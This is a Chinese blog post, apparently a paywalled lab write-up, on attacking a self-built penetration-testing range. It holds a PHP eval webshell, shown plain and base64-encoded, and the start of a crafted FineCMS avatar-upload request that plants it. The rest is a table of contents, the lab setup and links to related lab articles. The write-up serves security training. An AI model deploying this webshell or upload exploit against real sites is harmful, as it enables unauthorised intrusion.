自建靶场2022

最新推荐文章于 2024-10-18 11:31:33 发布
最新推荐文章于 2024-10-18 11:31:33 发布
阅读量4k 收藏 9
点赞数 3
CC 4.0 BY-SA版权
文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45423582/article/details/122866898

目录

一、靶场介绍

二、拿下web服务器

2.1 任意文件上传拿shell

2.2 反弹meterpreter

2.3 提权

2.4 抓取hash

三、内网渗透

3.1信息收集

3.2 配置代理

3.3 nmap扫描端口

3.4 漏洞利用

3.5 远程登录

四、补充:提权

4.1 本地提权

4.2 远程提权

一、靶场介绍

本靶场是一个简单的内网渗透靶场。需要首先拿到win2008服务器的权限,再渗透内网拿下WinXP,win2008上没有flag,flag在WinXP上。综合考验许多知识,暂未使用防护软件,属于一个比较基础的靶场。

主要配置如下:

系统

ip地址

kali 2020

192.168.1.106

win10 (本机)

192.168.1.104

win2008

192.168.1.107

winxp

10.101.10.133

靶场链接如下:

链接:https://pan.baidu.com/s/14WRh6C8Fdpk5hfmZ9ar8Uw

提取码:ehs8

ps:win10和kali自备

分享多了怕被封,所以目前是10名额,应该打靶场的人也不多。

二、拿下web服务器

2.1 任意文件上传拿shell

nmap 192.168.1.107 -p 8069 -sV

8069端口是web端口,访问 http://192.168.1.107:8069/ 发现是finecms。

百度搜索finecms漏洞

(15条消息) finecms前台任意文件上传——getshell_W小哥-CSDN博客_任意文件上传getshell

前台注册

首先上传一个正常的头像,找到路径

 <?php @eval($_POST['a']); ?>  # 一句胡木马base64加密
IDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=

构造数据包如下

POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be3
最低0.47元/天 解锁文章

200万优质内容无限畅学
Syche
关注
六步快速搭建靶场DVWA 多一步你顺着网线来打我
Lisuyu5201314的博客
06-09 2862
下载并安装PHPstudy 将解压后的DVWA源代码放置phpstudy安装目录下的WWW文件夹 打开刚刚重命名的config.in.php文件,修改db_user和db_password 都修改成root 浏览器访问http:/∥127.0.0.1/DVWA/setup.php,点击最下方的Create Database不好意思 这张没图 - -!浏览器访问http:/172.16.16.52/DVWA/,输入用户名admin,密码password登录dvwa 本机IP地址 关于PHP函数禁
kali利用docker搭建漏洞靶场Vulhub
qq_52627570的博客
05-09 842
注:如出现TypeError: kwargs_from_env() got an unexpected keyword argument 'ssl_version'错误,可选择使用命令pip install docker==6.1.3,再启动环境即可。虚拟机:Linux kali2022,网卡设置为NAT模式。检测docker-compose安装版本。检测docker安装版本及运行。物理机:Windows 10。
记一次自己搭建内网靶场(非常详细),零基础入门到精通,看这一篇就够了
weixin_51725318的博客
10-18 6040
记一次自己搭建内网靶场(非常详细),零基础入门到精通,看这一篇就够了
自建靶场WP(tp+SUID+容器逃逸)
DoNotShyDoIt的博客
07-19 1660
5.0.23*
你还没有自己的靶场吗?来,自己建一个吧
网络安全
01-26 1760
靶场篇1、在线靶场BugKu(简单,推荐新手入门,还有在线工具)https://ctf.bugku.com/index.html北京联合大学BUUCTF(新靶场,难度中上,搜集了很多大赛原题)https://buuoj.cn/CTFhub靶场(含历年赛题) https://www.ctfhub.com/#/indexCTFshow靶场(题较多) https://ctf.show/chall...
自建靶场 XSS练习(一)
fanxiaoyao1的博客
03-01 1043
自建靶场 XSS练习(一) 点击链接快速跳到指定关卡 文章目录自建靶场 XSS练习(一)靶场搭建一、第一关二、第二关三、第三关四、第四关五、第五关六、第六关七、第七关七、第八关九、第九关 靶场搭建 我用的是phpStudy,靶场代码可以去github上找,或者私信问我要 浏览器用的火狐,有hackbar插件,谁用谁知道 一、第一关 点击进入第一关 这关没啥难度,简单粗暴,后台也没有过滤。name=<script>alert(/xss/)</script>就过了,当然你想玩
DirtyPipe靶场
最新发布
03-24
4. **Local Setup (自建环境)**: 如果希望更灵活地控制实验条件,则可以在自己的计算机上安装合适的操作系统版本并手动应用补丁前后的状态来进行测试。具体做法如下: - 使用 VirtualBox 或 VMware 创建一个新的 ...
【春秋云镜】CVE-2023-43291 反序列化字符串逃逸+sql注入
RisingFan的博客
04-24 1118
emlog是一款轻量级博客及CMS建站系统,在emlog pro v.2.1.15及更早版本中的不受信任数据反序列化允许远程攻击者通过cache.php组件执行SQL语句。如果你是奔着找flag的思路,可以参考我下面的投机取巧,不过不建议这样干,这样其实对你学习这个漏洞,代码审计还是不太好,不建议这么干。先访问/admin看看,尝试了一波弱口令admin/admin123,成功登录。说实话已经写的很详细了,可参考复现,过程很清晰,还带着分析,很人性了。先搜了搜有关漏洞的细节,具体可参考。
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2889
迟到的文章,就当库存发出来吧~
【超简单】小白也能搭建的pikachu靶场_github自己搭建靶场
m0_61331573的博客
04-09 968
1、点击链接,下载文件2、 将其放置在自己的环境目录的www下然后就可以访问进来了。
漏洞靶场平台搭建与漏洞分析文档
04-29
漏洞靶场平台搭建与漏洞分析文档,里面包含漏洞靶场网站的搭建、漏洞分析、工具使用、漏洞脚本样例,来源是红日安全,大家一起学习,进步!
【文件上传】FineCMS 2.0.1.zip
01-05
文件上传靶场(附带环境 可以直接使用)
0基础教你搭建靶场(本地、虚拟机)
2301_76332302的博客
04-18 4166
完成CMS安装后,导入sqlmap文件夹至虚拟机Kali Linux中root文件夹内(可在本机系统用Xftp软件实现),此时sqlmap.py文件路径为root/sqlmap/,访问靶场。数据库名称:可随便写(建议写bluecms),数据库用户名:root ,数据库密码:root。在虚拟机Windows 2003里启动phpstudy,并设置端口号为90,其他设置参照前面本地搭建靶场phpstudy设置。3,点其他选项菜单,见下图标识点3,新的弹出菜单里选择"phpStudy设置"—
带你快速搭建一个支持ctf动态独立靶机的靶场
fly_enum的博客
09-11 1247
​ 要说开源的ctf训练平台,ctfd是不错的选择,支持各种插件,今天我就来介绍一下如何部署一款支持独立动态靶机的插件。前提是你的ctfd也是docker部署的。
记一次自建靶场三层代理内网渗透过程
Boom!脑洞大爆炸的博客
07-04 1051
记一次自建靶场三层代理内网渗透过程
记一次自建靶场域渗透过程
Boom!脑洞大爆炸的博客
07-04 1345
记一次自建靶场域渗透过程
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 2913
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
自己写一个php上传靶场,GitHub - 7257018/upload-labs-writeup: upload-labs 上传漏洞靶场的解题方法...
weixin_39623411的博客
03-18 290
0x00:前言本篇文章主要记录绕过一个基于php语言的上传漏洞的靶场项目upload-labs (最新commit17ec936) 的19个上传关卡的方法。文章适合有一定上传绕过知识基础的读者阅读,绕过原理请参考其它文章和项目源码,限于篇幅文章中不展开解释。0x01:测试配置可直接下载作者的配置好的PHPStudy靶场运行环境,节省时间。浏览器Firefox插件NoScript插件HackBar抓...
2020-11-16(综合渗透靶场(一))
wahhh123admin的博客
11-17 1368
**综合性靶场mrRobot(一 )** 标题&nmap信息收集& kail:192.168.99.17 靶机ip:nmap 192.168.99.0/24 得出ip为192.168.99.23 找到了ip,查看具体信息 nmap -A 192.168.99.23 结论:80端口是apache服务 靶机系统为Linux 查看又没有隐藏的端口 nmap -p- 192.168.99.23 没有隐藏端口 ...
mysql使用Python自建靶场
12-20
在MySQL中使用Python自建靶场主要是利用Python的数据库连接库,如`mysql-connector-python`或`pymysql`,来进行数据库操作。以下是一个基本步骤: 1. **安装依赖库**: 首先确保已经安装了`python-mysqldb`或`...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值